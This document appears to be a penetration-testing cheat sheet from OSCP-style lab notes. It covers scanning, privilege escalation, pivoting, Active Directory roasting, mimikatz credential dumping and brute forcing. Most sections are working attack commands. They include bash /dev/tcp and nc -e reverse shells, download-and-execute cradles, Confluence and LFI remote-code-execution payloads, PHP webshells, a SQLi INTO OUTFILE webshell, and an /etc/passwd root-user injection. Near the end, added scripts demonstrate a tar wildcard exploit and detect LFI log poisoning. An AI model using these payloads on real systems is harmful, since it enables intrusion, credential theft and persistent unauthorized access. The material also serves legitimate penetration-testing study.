# Initial portscanning and web enum

Group hosts in a file and scan them for web apps
```
nmap -iL hosts --open -v -sV -p 80,443,8080,8000,5000 -oA initial-web -Pn -n
```

Group hosts in a file and scan the 1000 most common ports (`-r` scans them in order instead of randomised)
```
nmap -iL hosts --open -v -sV -oA initial-1k -Pn -n -r
```

Scan a broader list of commonly interesting ports on a single host:
```
nmap --open -vv host -p 21,22,23,25,79,80,88,110,111,113,135,137,138,139,143,161,162,264,334,389,443,445,512,513,514,548,554,593,623,636,873,992,1022,1090,1098,1099,1311,1433,1521,1522-1529,1540,1541,1560,1801,2022,2049,2121,2222,2301,2375,2376,2381,3050,3128,3260,3299,3306,3389,4321,4444,4445,4786,4848,4990,5000,5060,5432,5433,5555,5556,5800,5900,5984,5985,6000,6066,6129,6379,7000-7004,7070,7071,8000-8003,8006,8008,8009,8080,8081,8088,8090,8180,8181,8383,8400,8443,8500,8554,8686,8800,8880,8888,8983,9000,9001,9002,9003,9012,9100,9160,9200,9300,9443,9503,10000,10050,10051,10255,10999,11099,11111,11211,16379,26379,27017,27018,27019,28017,44818,45000,45001,47001,47002,50500 -oA host
```

Don't forget to scan UDP ports (SNMP, TFTP); use distinct `-oA` names so the second scan does not overwrite the first
```
sudo nmap -iL hosts --open -v -sU -p161 -oA udp-snmp
```

```
sudo nmap -iL hosts --open -v -sU -p69 -oA udp-tftp #tftp
```

Don't forget the WinRM port
```
nmap -iL hosts --open -v -p5985 -oA winrm
```

Directory brute force (`-b` blacklists the listed status codes)
```
gobuster dir -u "http://192.168.153.149" -w /usr/share/dirb/wordlists/common.txt -b 404,403
```

TODO: httpx / aquatone to probe and screenshot the discovered web services
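An added example (not part of the original notes) for turning the `-oA initial-web` output into targets for the web enumeration step: it parses the grepable `.gnmap` file that nmap writes next to the `.nmap` and `.xml`, keeps only open ports, and derives `http://` or `https://` base URLs (by port and by the `ssl|` service prefix that `-sV` reports) ready to feed gobuster or httpx. The scan output below is constructed inline; hosts, ports and banners are made up.

```shell
#!/bin/sh
# Parse nmap grepable output (-oG, or the .gnmap file from -oA) into "ip port service version"
# lines, one per open port. Fields of a "Host:" line are tab-separated; the "Ports:" field lists
# entries as port/state/proto/owner/service/rpc/version/ separated by ", ".
gnmap_open_ports() {
  awk -F'\t' '/^Host: / {
    ip = $1; sub(/^Host: /, "", ip); sub(/ .*/, "", ip)
    for (i = 2; i <= NF; i++) {
      if ($i !~ /^Ports: /) continue
      ports = $i; sub(/^Ports: /, "", ports)
      n = split(ports, p, ", ")
      for (j = 1; j <= n; j++) {
        split(p[j], f, "/")
        if (f[2] == "open") print ip, f[1], f[5], f[7]
      }
    }
  }' "$1"
}

# Derive base URLs for web enumeration: TLS when -sV tagged the service "ssl|..." or the port is a
# usual HTTPS port, plain HTTP for anything else whose service name contains "http".
gnmap_web_targets() {
  gnmap_open_ports "$1" | awk '
    substr($3, 1, 4) == "ssl|" || $2 == 443 || $2 == 8443 { print "https://" $1 ":" $2; next }
    index($3, "http") > 0                                  { print "http://" $1 ":" $2 }'
}

# Emit one gobuster command per target (printed, not executed).
gnmap_gobuster_cmds() {
  gnmap_web_targets "$1" | while read -r url; do
    printf 'gobuster dir -u "%s" -w /usr/share/dirb/wordlists/common.txt -b 404,403\n' "$url"
  done
}

# Constructed sample in nmap's grepable format (not real scan output), written to a temp file.
sample_gnmap() {
  f=$(mktemp)
  {
    printf '# Nmap 7.94 scan initiated (constructed sample) as: nmap -iL hosts --open -sV -oA initial-web\n'
    printf 'Host: 192.168.50.10 ()\tStatus: Up\n'
    printf 'Host: 192.168.50.10 ()\tPorts: 80/open/tcp//http//Apache httpd 2.4.49/, 443/open/tcp//ssl|http//nginx 1.18.0/\tIgnored State: closed (3)\n'
    printf 'Host: 192.168.50.11 ()\tPorts: 8080/open/tcp//http-proxy//Jetty 9.4/, 445/open/tcp//microsoft-ds///, 3389/filtered/tcp//ms-wbt-server///\n'
    printf 'Host: 192.168.50.12 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2/\n'
    printf '# Nmap done (constructed sample)\n'
  } > "$f"
  printf '%s\n' "$f"
}

# Usage on a real scan: gnmap_web_targets initial-web.gnmap | tee web-targets.txt
f=$(sample_gnmap)
gnmap_web_targets "$f"
rm -f "$f"
```

Filtered ports and non-web services (445, 22 in the sample) are kept by `gnmap_open_ports` for the rest of the triage but never become URLs.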

## Windows

Scan a single port
```
Test-NetConnection -Port 445 172.16.124.102
```

Scan multiple ports (connect errors for closed ports are discarded with `2>$null`)
```powershell
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("172.16.124.102", $_)) "TCP port $_ is open"} 2>$null
```

## Linux

Quick TCP connect scan with netcat
```
netcat -v -z -n -w 1 192.168.45.230 1-1023
```


# Reverse Shell

## Linux

Upgrade a dumb shell to a PTY
```
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

## Windows

Do PtH (pass-the-hash) and execute a PowerShell command that downloads and runs a reverse shell (`shell.ps1` is expected to define the `shell` function):
```
iex(new-object net.webclient).downloadstring('http://192.168.45.230:8000/shell.ps1');shell
```

Generate an exe payload using msfvenom:
```
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.45.179 LPORT=4444 -f exe -o meterpreter.exe
```

# NC

Download nc.exe to the target
```
powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe
```

Connect back with a cmd.exe reverse shell
```
C:\Windows\Temp\nc.exe -e cmd.exe 192.168.45.206 4446
```

## PHP
```php
```

# File Exchange

## Linux

Host an SMB server with credentials (impacket)
```
sudo smbserver.py share . -smb2support -username user -password P@ssw0rd
```

Mount an SMB share
```
mount -t cifs -o "username=michelle,password=NotMyPassword0k?" //172.16.120.21/apps /mnt/
```

Host a WebDAV server
```
wsgidav --host=0.0.0.0 --port=8080 --auth=anonymous --root .
```

## Windows

Download files with certutil or iwr (Invoke-WebRequest)
```
certutil.exe -urlcache -f http://192.168.45.230:8000/winPEASx64.exe winPEASx64.exe

iwr -uri http://192.168.45.179:8000/chisel.exe -Outfile chisel.exe

iwr -uri http://192.168.49.103:8000/mimikatz.exe -Outfile mimikatz.exe

iwr -uri http://192.168.49.103:8000/agent.exe -Outfile agent.exe

iwr -uri http://192.168.49.103:8000/winPEASx64.exe -Outfile winPEASx64.exe

iwr -uri http://192.168.45.241:8000/PowerView.ps1 -Outfile PowerView.ps1

iwr -uri http://192.168.45.246:8000/PowerUp.ps1 -Outfile PowerUp.ps1

iwr -uri http://192.168.49.124:8000/winPEAS.bat -outfile winPEAS.bat

iwr -uri http://192.168.49.103:8000/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe

iwr -uri http://192.168.49.103:8000/GodPotato.exe -Outfile GodPotato.exe

iwr -uri http://192.168.49.103:8000/nc.exe -Outfile nc.exe

iwr -uri http://192.168.45.241:8000/reverse.exe -Outfile reverse.exe

iwr -uri http://192.168.45.241:8000/SharpHound.ps1 -Outfile SharpHound.ps1

iwr -uri http://192.168.49.124:8000/SharpHound.exe -Outfile SharpHound.exe

iwr -uri http://192.168.45.172:8000/Procmon.exe -Outfile Procmon.exe

iwr -uri http://192.168.45.241:8000/WSuspicious.exe -Outfile WSuspicious.exe
```


Connect to an SMB share using a password
```
net use H: "\\192.168.49.103\share" P@ssw0rd /user:user
```

# OS Enumeration and LPE


## FreeBSD

Open ports
```
netstat -an -p tcp
sockstat -P tcp
```

Installed software
```
pkg info
```

Check groups
```
cat /etc/group
```

Show services
```
service -l
```

Check doas.conf (the BSD sudo replacement; look for permit rules without a password)
```
cat /usr/local/etc/doas.conf
```

## Windows

Find uncommon services (binaries outside system32)
```
Get-CimInstance -ClassName win32_service | Select Name,State,PathName |findstr -i -V "system32"
```

```
wmic service get name,pathname |findstr -i -V "system32" | findstr -V "^$"
```

Scheduled tasks that run something outside system32
```
schtasks /query /fo LIST /v |findstr -i "Run:" | findstr -v "COM handler" | findstr -i -v system32
```

General system info:
```
Get-LocalUser
Get-LocalGroup
Get-LocalGroupMember Administrators
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-Process | ForEach-Object {$_.Path}
Get-History
(Get-PSReadlineOption).HistorySavePath

```

```
net user /domain

$env:AppKey
cmdkey /list
ipconfig
netstat -ano -p tcp
whoami /all
Get-ChildItem -Path C:\ -Include *.txt,*.zip -Recurse -ErrorAction SilentlyContinue -Force
Get-ChildItem C:\Users\offsec\AppData *.txt -recurse -ErrorAction SilentlyContinue -Force

Get-Process
.\winPEASx64.exe log
.\winPEAS.bat log
```

Show Kerberos tickets
`klist`

Check PuTTY sessions (saved hosts, proxy settings and credentials)
```
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
```

Check PowerShell history
```
Get-ChildItem -Path C:\ -Filter "ConsoleHost_history.txt" -Recurse -ErrorAction SilentlyContinue -Force
(Get-PSReadlineOption).HistorySavePath
```

Download and run PowerUp (all checks)
```
IEX (New-Object Net.WebClient).DownloadString('http://192.168.45.230:8000/PowerUp.ps1'); Invoke-AllChecks
```

Download PowerView, then call its functions (e.g. `Get-Domain`)
```
IEX (New-Object Net.WebClient).DownloadString('http://192.168.45.230:8000/PowerView.ps1'); Get-Domain
```

Verbose list of scheduled tasks
```
schtasks /query /fo LIST /v
Get-ScheduledTask
```

List, start and restart services
```
Get-Service
powershell -c "Start-Service -Name AuditTracker"
Restart-Service schedule
Start-Service -Name <service>
```

Monitor a difference in output (e.g. a service that is restarted periodically by a scheduled task)
```
# https://raw.githubusercontent.com/markwragg/PowerShell-Watch/master/Watch/Public/Watch-Command.ps1
Get-Service | Watch-Command -Diff -Cont
```

PrintSpoofer reverse shell (needs SeImpersonatePrivilege)
```
.\PrintSpoofer64.exe -c "c:\Temp\nc.exe 192.168.45.246 8001 -e cmd"
.\PrintSpoofer64.exe -c "reverse.exe"
```

GodPotato reverse shell (needs SeImpersonatePrivilege)
```
.\GodPotato.exe -cmd "nc.exe -e cmd.exe 192.168.45.230 4444"

.\GodPotato.exe -cmd "reverse.exe"
```

### PowerUp

Import the module inside an execution-policy-bypassed shell (importing it through `powershell -c` loads it into a child process that exits immediately)
```
powershell -ep bypass
Import-Module .\PowerUp.ps1
Get-ModifiableServiceFile
Get-UnquotedService
```

## Linux

Check running processes
```
ps aux
```

Read all the cron jobs

```
cat /etc/cron*
```

Check cron logs
```
grep "CRON" /var/log/syslog
```

Find SUID binaries
```
find / -perm -u=s -type f 2>/dev/null
```

Find files owned by a given user
```
find / -user stuart 2>/dev/null | grep -v -e proc -e systemd -e cgroup
```

Find writable directories
```
find / -writable -type d 2>/dev/null
```

Find binaries with capabilities
```
/usr/sbin/getcap -r / 2>/dev/null
```

Download PwnKit (pkexec local privilege escalation)
```
wget 192.168.49.103:8000/PwnKit
```

Download and execute linpeas, keeping a copy of the output
```
curl 192.168.49.103:8000/linpeas.sh | sh | tee result
```

Check groups
```
cat /etc/group
```

iptables rules
```
cat /etc/iptables/rules.v4
```

Writable passwd file: append a second UID 0 user with a known password hash
```
ls -lah /etc/passwd
openssl passwd w00t -> Fdzt.eqJQ4s0g
echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2
```

LPE via tar wildcard expansion: in the directory a privileged `tar ... *` job archives, create a payload and two files whose names tar parses as options
```
echo "echo 'cassie ALL=(root) NOPASSWD: ALL' >> /etc/sudoers" > privesc.sh
echo "" > '--checkpoint=1'
echo "" > '--checkpoint-action=exec=sh privesc.sh'
```


# Pivoting

## Chisel
Run as client (attacker); `socks` opens a local SOCKS proxy (default 127.0.0.1:1080) through the server
```
./chisel client 192.168.249.121:8080 socks
```

Run as server (compromised host)
```
.\chisel.exe server --socks5
```

## Ligolo (better)

Run proxy as a server (attacker)
```
# Create the tun interface and bring it up (once)
sudo ip tuntap add user username mode tun ligolo
sudo ip link set ligolo up

ligolo-proxy -selfcert

# Once the agent has connected and the session is started, route the internal network through the tunnel
sudo ip route add 192.168.0.0/24 dev ligolo
```

Run agent as a client (compromised host)
```
.\agent.exe -connect 192.168.49.103:11601 -ignore-cert
```

## Socat

Listen on local port 2222 and forward each connection to 10.4.196.215:22 (port forward on a pivot host)
```
socat -ddd TCP-LISTEN:2222,fork TCP:10.4.196.215:22
```

## SSH

Remote port forwarding (from the compromised host to the attacker machine, to reach a single host+port in the deeper network; binding 0.0.0.0 on the attacker side needs `GatewayPorts yes` in its sshd_config)
```
ssh -N -R 0.0.0.0:4444:10.4.218.215:4444 oscp@192.168.45.206
```

Remote dynamic port forward (from the compromised host to the attacker machine; a SOCKS proxy on the attacker's port 9998 into the deeper network, needs OpenSSH 7.6+)
```
ssh -N -R 9998 oscp@192.168.45.206
```

## Plink

Remote-forward the compromised host's RDP port to the attacker's 127.0.0.1:9833
```
C:\Windows\Temp\plink.exe -ssh -l oscp -pw oscp -R 127.0.0.1:9833:127.0.0.1:3389 192.168.45.206
```


# Active Directory

## Enumeration

Download and run SharpHound
```powershell
IEX (New-Object Net.WebClient).DownloadString('http://192.168.49.124:8000/SharpHound.ps1'); Invoke-BloodHound -c All -s
```

Run RustHound from a Linux box through the SOCKS proxy
```bash
proxychains ./rusthound -i 172.16.184.10 -u joe -p Flowers1 --domain medtech.com
```

## Kerberos

Kerberoasting
```
netexec ldap 10.10.207.140 -u celia.almeda -p "7k8XHk3dMtmpnC7" --kerberoasting KERBEROASTING
```

```
Rubeus.exe kerberoast /outfile:hashes.txt
```

AS-REP roasting
```
netexec ldap 10.10.207.140 -u celia.almeda -p "7k8XHk3dMtmpnC7" --asreproast ASREPROAST
```

# Generic Windows

Connect to a compromised host via WinRM (pass-the-hash with the NT hash)
```
evil-winrm -i 192.168.224.121 -u administrator -H "b2c03054c306ac8fc5f9d188710b0168"
```


Connect to a compromised host via RDP, sharing a local folder as a drive
```
xfreerdp /v:172.16.234.12:3389 /u:yoshi /p:"Mushroom\!" /cert-ignore /d:medtech.com /compression /drive:shared,/home/username/EDUCATION/OSCP/
```

Command execution via psexec
```
psexec.py medtech.com/leon:"rabbit:)"@172.16.234.10
```

# Post Exploitation

## Windows Persistence

Add a local administrator
```
net user curiv P@ssw0rd /add
net localgroup administrators curiv /add
```

## Windows

Credential dumping with mimikatz (`log` writes a transcript file; `token::elevate` needs an elevated shell)
```
.\mimikatz.exe "token::elevate" "log" "lsadump::lsa /inject" exit
.\mimikatz.exe "token::elevate" "lsadump::secrets" exit
.\mimikatz.exe "token::elevate" "lsadump::sam" exit
.\mimikatz.exe "lsadump::sam /system:C:\windows.old\Windows\System32\SYSTEM /sam:C:\windows.old\Windows\System32\SAM" exit
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"
```

# Password attacks

## Bruteforce

SSH (single user, password list)
```
hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
```

RDP (password spray: user list, single password)

```
hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202
```

HTTP POST form (the string after the last `:` is the failure message hydra looks for)
```
hydra -l user -P ~/wordlists/PASSWORDS/rockyou.txt 192.168.196.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
```

HTTP basic auth
```
hydra -l admin -P ~/wordlists/PASSWORDS/rockyou.txt -s 80 -f 192.168.196.201 http-get
```

# Databases

## MSSQL

Connect and execute queries
```
netexec mssql 192.168.242.248 -u emma -p "SomersetVinyl1\!" --port 49965 -q "select @@version;"
```

Enable command execution
1. connect to the host: `impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth`
2. `EXECUTE sp_configure 'show advanced options', 1;`
3. `RECONFIGURE;`
4. `EXECUTE sp_configure 'xp_cmdshell', 1;`
5. `RECONFIGURE;`

File upload, then reverse shell through xp_cmdshell
```
netexec mssql 10.10.113.148 -u sql_svc -p "Dolphin1" --put-file nc.exe C:\Windows\Temp\nc.exe
```

```
netexec mssql 10.10.113.148 -u sql_svc -p "Dolphin1" -x "C:\Windows\Temp\nc.exe 10.10.113.147 4444 -e cmd.exe"
```

## Mongo

Connect to MongoDB
```
mongosh 172.16.203.30
```

## MySQL

```

```


# SNMP

Bruteforce SNMP community strings
```
sudo onesixtyone 192.168.165.145
```

SNMP base enum with nmap
`sudo nmap 192.168.213.156 -sU -p161 --script="snmp*" -v`

SNMP user enumeration
`sudo nmap 192.168.165.145 -sU -p161 --script=snmp-win32-users`

netstat enum
`sudo nmap 192.168.165.145 -sU -p161 --script=snmp-netstat`

General dump
```
snmpbulkwalk -c public -v2c 192.168.213.156
```

Software enum (hrSWInstalledName)
```
snmpwalk -c public -v1 192.168.153.149 1.3.6.1.2.1.25.6.3.1.2
```

Open ports (tcpConnLocalPort)
```
snmpwalk -c security 192.168.103.110 1.3.6.1.2.1.6.13.1.3 -v2c
```

Extended output (NET-SNMP `extend` scripts; the object is `nsExtendOutputFull`)
```
snmpwalk -c security 192.168.103.110 NET-SNMP-EXTEND-MIB::nsExtendOutputFull -v2c
```

# WEB

## File Upload

Inject a UNC path pointing at Responder into the filename of a multipart POST to capture a NetNTLM hash
```
Content-Disposition: form-data; name="myFile"; filename="\\\\192.168.45.206\\test"
```

## Confluence RCE

Expression injection (`${...}`) in the URL path; the payload spawns a bash reverse shell
```
curl http://192.168.218.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.206/4444%200%3E%261%27%29.start%28%29%22%29%7D/ -v
```
## Apache RCE

Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)

https://www.exploit-db.com/exploits/50383

## LFI Log poisoning

Poison the log by sending the payload in the User-Agent header (Linux); the header value below is a placeholder, the real value must be PHP that executes the `cmd` parameter (e.g. via `system`)
```
GET /meteor/index.php?page=../../../../../../../var/log/apache2/access.log HTTP/1.1
Host: 192.168.196.16
User-Agent: pentest
Accept: */*
```

Poison the log by injecting the User-Agent (Windows, XAMPP)
```
GET /meteor/index.php?page=../../../../../../xampp\apache\logs\access.log HTTP/1.1
Host: 192.168.196.193
User-Agent: pentest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
```

Execute commands by providing the `cmd` GET parameter (adjust the log path according to the target OS)

```
GET /meteor/index.php?page=../../../../../../../var/log/apache2/access.log&cmd=ps HTTP/1.1
Host: 192.168.196.16
User-Agent: pentest
Accept: */*
Connection: keep-alive
```



Send a reverse shell (URL-encoded payload `bash -c "bash -i >& /dev/tcp/192.168.45.241/8001 0>&1"`)
```
GET /meteor/index.php?page=../../../../../../../var/log/apache2/access.log&cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.241%2F8001%200%3E%261%22 HTTP/1.1
Host: 192.168.196.16
User-Agent: pentest
Accept: */*
Connection: keep-alive
```


## LFI PHP wrappers

Base64-encode PHP source via the `php://filter` wrapper and output it as text (reads the source instead of executing it)

```
http://192.168.196.16/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php
```

Command execution via the `data://` wrapper, plain text (append the PHP payload after the comma)
```
curl "http://192.168.196.16/meteor/index.php?page=data://text/plain,"
```

Command execution via the `data://` wrapper with the PHP payload base64-encoded (bypasses naive filters on `system` or on the PHP tags)
```
curl "http://192.168.196.16/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls"
```
(the base64 decodes to `<?php echo system($_GET["cmd"]);?>`)

## RFI

simple-backdoor.php (ships with Kali in /usr/share/webshells/php/)
```php
<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>
```

Include the remote PHP file and provide a command to execute
```
curl "http://192.168.196.16/meteor/index.php?page=http://192.168.45.241/simple-backdoor.php&cmd=ls"
```


## RCE

OS command injection in a form parameter (Linux target), URL-encoded `;nc -c bash 192.168.45.241 80`
`Archive=2ip.ru%3Bnc%20-c%20bash%20192.168.45.241%2080`

## SQLi

Authentication bypass

```
offsec' OR 1=1 -- //
```

Time-based blind
```
offsec' AND IF (1=1, sleep(3),'false') -- //
```

Web shell via `INTO OUTFILE` (identify the number of columns first; needs the `FILE` privilege and a web root writable by the DB user)

```
' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null INTO OUTFILE "/var/www/html/tmp/webshell1.php" -- //
```

Error-based SQLi
```
' or 1=1 in (select @@version) -- //
```

PostgreSQL RCE, first step: a stacked query creating the table that will hold command output
```
weight=1&height=1'; CREATE TABLE shell(output text); -- //&age=1&gender=Male&email=test%40test.com
```


## Confluence RCE

Download chisel onto the Confluence host
```
curl http://192.168.196.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27wget%20192.168.45.241/chisel%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel%27%29.start%28%29%22%29%7D
```

Connect back to the attacker's chisel server (reverse SOCKS)
```
curl http://192.168.196.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27/tmp/chisel%20client%20192.168.45.241:8080%20R:socks%27%29.start%28%29%22%29%7D/
```

Reverse shell
```
curl http://192.168.196.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.241/443%200%3E%261%27%29.start%28%29%22%29%7D/
```
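The tar wildcard technique from the Linux LPE section, as an added runnable demonstration that is not part of the original notes: it reproduces in a scratch directory what the privileged cron job does, `tar cf backup.tar *`, and shows the unquoted glob expanding the two crafted filenames into `--checkpoint` options so that `privesc.sh` runs; the hardened variant passes `./*`, which GNU tar no longer reads as options. Instead of the sudoers edit the payload only creates a marker file, so the whole thing runs as an unprivileged user; the directory and file names are made up.

```shell
#!/bin/sh
# Simulate a privileged backup job archiving a directory the attacker can write to.
# run_backup_job prints "pwned" if the planted privesc.sh was executed by tar, "safe" otherwise.
# Requires GNU tar (--checkpoint-action is GNU-specific).

# Plant what the attacker controls: the payload plus two filenames that look like options.
plant_payload() {   # $1 = writable directory that the job will archive
  printf 'this is a backup target\n' > "$1/notes.txt"
  # Marker file instead of the sudoers edit from the notes; in real life this runs with tar's privileges.
  printf '#!/bin/sh\ntouch "%s/pwned"\n' "$1" > "$1/privesc.sh"
  : > "$1/--checkpoint=1"
  : > "$1/--checkpoint-action=exec=sh privesc.sh"
}

# Run one "cron job" variant in a fresh directory. $1 = "vulnerable" or "hardened".
run_backup_job() {
  work=$(mktemp -d)
  plant_payload "$work"
  (
    cd "$work" || exit 1
    if [ "$1" = vulnerable ]; then
      # The unquoted * expands to: '--checkpoint-action=exec=sh privesc.sh' '--checkpoint=1' notes.txt privesc.sh
      # GNU getopt permutation lets tar treat the first two as options even though they follow the file list.
      tar cf backup.tar * 2>/dev/null
    else
      # ./* makes every expanded argument start with "./", so none can be parsed as an option.
      tar cf backup.tar ./* 2>/dev/null
    fi
  )
  if [ -f "$work/pwned" ]; then result=pwned; else result=safe; fi
  rm -rf "$work"
  printf '%s\n' "$result"
}

echo "vulnerable job: $(run_backup_job vulnerable)"   # pwned
echo "hardened job:   $(run_backup_job hardened)"     # safe
```

Quoting the glob (`"*"`) is not a fix, since tar then looks for a file literally named `*`; the defensive options are `./*`, a `--` end-of-options marker before the file list, or archiving a directory name instead of its contents.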
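The LFI log-poisoning and PHP-wrapper chain from the WEB section seen from the defender's side, as an added example that is not part of the original notes: a small triage script over an Apache combined-format access log that flags (1) requests whose User-Agent carries a PHP open tag, i.e. the poisoning step, (2) `page=` values that traverse to a log file or use `php://`, `data://` or a remote URL, and (3) the subset of those that also pass a `cmd=` parameter, i.e. the execution step. The log lines are constructed to mirror the requests in the notes; the `page` parameter name and the `/meteor/` path come from there, all addresses, timestamps and sizes are made up.

```shell
#!/bin/sh
# Triage an Apache combined-format access log for the LFI log-poisoning chain.
# Each stage is a single grep so the rules can be lifted into a SIEM query as they are.

# 1) Poisoning: a User-Agent (the last quoted field of the line) that contains a PHP open tag.
poisoned_user_agents() {
  grep -iE '"[^"]*<\?(php|=)[^"]*"$' "$1" || true
}

# 2) Inclusion: page= pointing at a traversal, a php:// or data:// wrapper, or a remote URL (RFI).
lfi_requests() {
  grep -iE 'page=[^& ]*(\.\./|\.\.%2f|%2e%2e|php://|data://|https?://)' "$1" || true
}

# 3) Execution: an inclusion request that also carries the cmd= parameter.
lfi_exec_requests() {
  lfi_requests "$1" | grep -iE '[?&]cmd=' || true
}

# Number of lines a stage produced (0 on empty input, unlike grep -c's exit status).
count() { awk 'END { print NR }'; }

# One-line summary suitable for an alert: poisoned=N lfi=N exec=N
triage_access_log() {
  printf 'poisoned=%s lfi=%s exec=%s\n' \
    "$(poisoned_user_agents "$1" | count)" \
    "$(lfi_requests "$1" | count)" \
    "$(lfi_exec_requests "$1" | count)"
}

# Constructed sample log (not real traffic): 192.168.45.241 plays the attacker.
sample_access_log() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
10.0.0.5 - - [10/Oct/2023:10:00:01 +0000] "GET /meteor/index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.45.241 - - [10/Oct/2023:10:01:10 +0000] "GET / HTTP/1.1" 200 312 "-" "<?php echo system($_GET['cmd']); ?>"
192.168.45.241 - - [10/Oct/2023:10:01:12 +0000] "GET /meteor/index.php?page=../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 90112 "-" "pentest"
192.168.45.241 - - [10/Oct/2023:10:01:15 +0000] "GET /meteor/index.php?page=../../../../../../../var/log/apache2/access.log&cmd=ps HTTP/1.1" 200 90480 "-" "pentest"
192.168.45.241 - - [10/Oct/2023:10:02:00 +0000] "GET /meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php HTTP/1.1" 200 2048 "-" "curl/8.0"
192.168.45.241 - - [10/Oct/2023:10:02:30 +0000] "GET /meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls HTTP/1.1" 200 640 "-" "curl/8.0"
192.168.45.241 - - [10/Oct/2023:10:03:00 +0000] "GET /meteor/index.php?page=http://192.168.45.241/simple-backdoor.php&cmd=ls HTTP/1.1" 200 700 "-" "curl/8.0"
10.0.0.7 - - [10/Oct/2023:10:04:00 +0000] "GET /meteor/index.php?page=about HTTP/1.1" 200 480 "-" "Mozilla/5.0"
EOF
  printf '%s\n' "$f"
}

# Usage against a real log: triage_access_log /var/log/apache2/access.log
f=$(sample_access_log)
triage_access_log "$f"    # poisoned=1 lfi=5 exec=3
rm -f "$f"
```

The poisoning request itself (stage 1) is easy to miss because it targets any URL, not the vulnerable page; that is why it gets its own rule rather than being folded into the `page=` check, and why, once the access log has been poisoned, every later include of that log executes the payload regardless of what the later requests look like.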